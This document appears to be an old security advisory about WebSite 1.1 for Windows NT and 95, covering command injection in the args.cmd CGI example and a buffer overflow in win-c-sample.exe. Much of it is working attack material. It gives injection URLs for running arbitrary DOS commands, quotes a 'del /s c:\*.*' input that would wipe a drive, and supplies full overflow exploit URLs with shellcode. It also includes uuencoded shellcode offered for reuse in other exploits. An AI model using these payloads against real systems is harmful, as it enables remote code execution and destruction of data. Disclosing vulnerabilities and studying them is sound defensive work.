DATE: COMMAND SOURCE: AUTHOR: WebSite SYSTEMS AFFECTED WinNT, Win95 WebSite 1.1 PROBLEM There're some nice security holes in WebSite v1.1e for Windows NT and '95, in the CGI example programs. The first thing that You will noticed is about the scripts, they have the following lines in cgi-dos/args.cmd (and some others): rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider rem a query string of xxx&del+/s+c:\*.* Your hard drive gets rem erased!! Same goes for args and extra path info!!! and then some lines like this: echo QUERY_STRING="%QUERY_STRING%" The exploit can be: http://website.host/cgi-dos/args.cmd?"&any+dos+command" There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there: char *argv; // Max 32 command line args That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow. Here are the exploits (Solar splited the long URLs into several lines), you can use any dos command in them (replace spaces with _'s): WinNT (any version?): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A %06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10% FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy _\WebSite\readme.1st_\WebSite\htdocs\x1.htm Win95 (the release version only, will crash others!): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A %06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0 3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\ x1.htm The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request). The solution Solar used in the exploits above is doing a call to fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (Solar don't have Win95 himself, thanks must go to Lord Byte for loading his WinIce and telling him the offsets). The two functions I use are WinExec and ExitProcess. Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish. begin 644 shell_nt.bin M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z F4$`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$`77P@^D<_]'[ ` end begin 644 shell_95.bin M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8 ,7WQ?N5A0?&`#RO_1 ` end Credit for this discovery goes to Solar Designer. EXPLOIT SOLUTION Just remove the examples after You, the Webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release.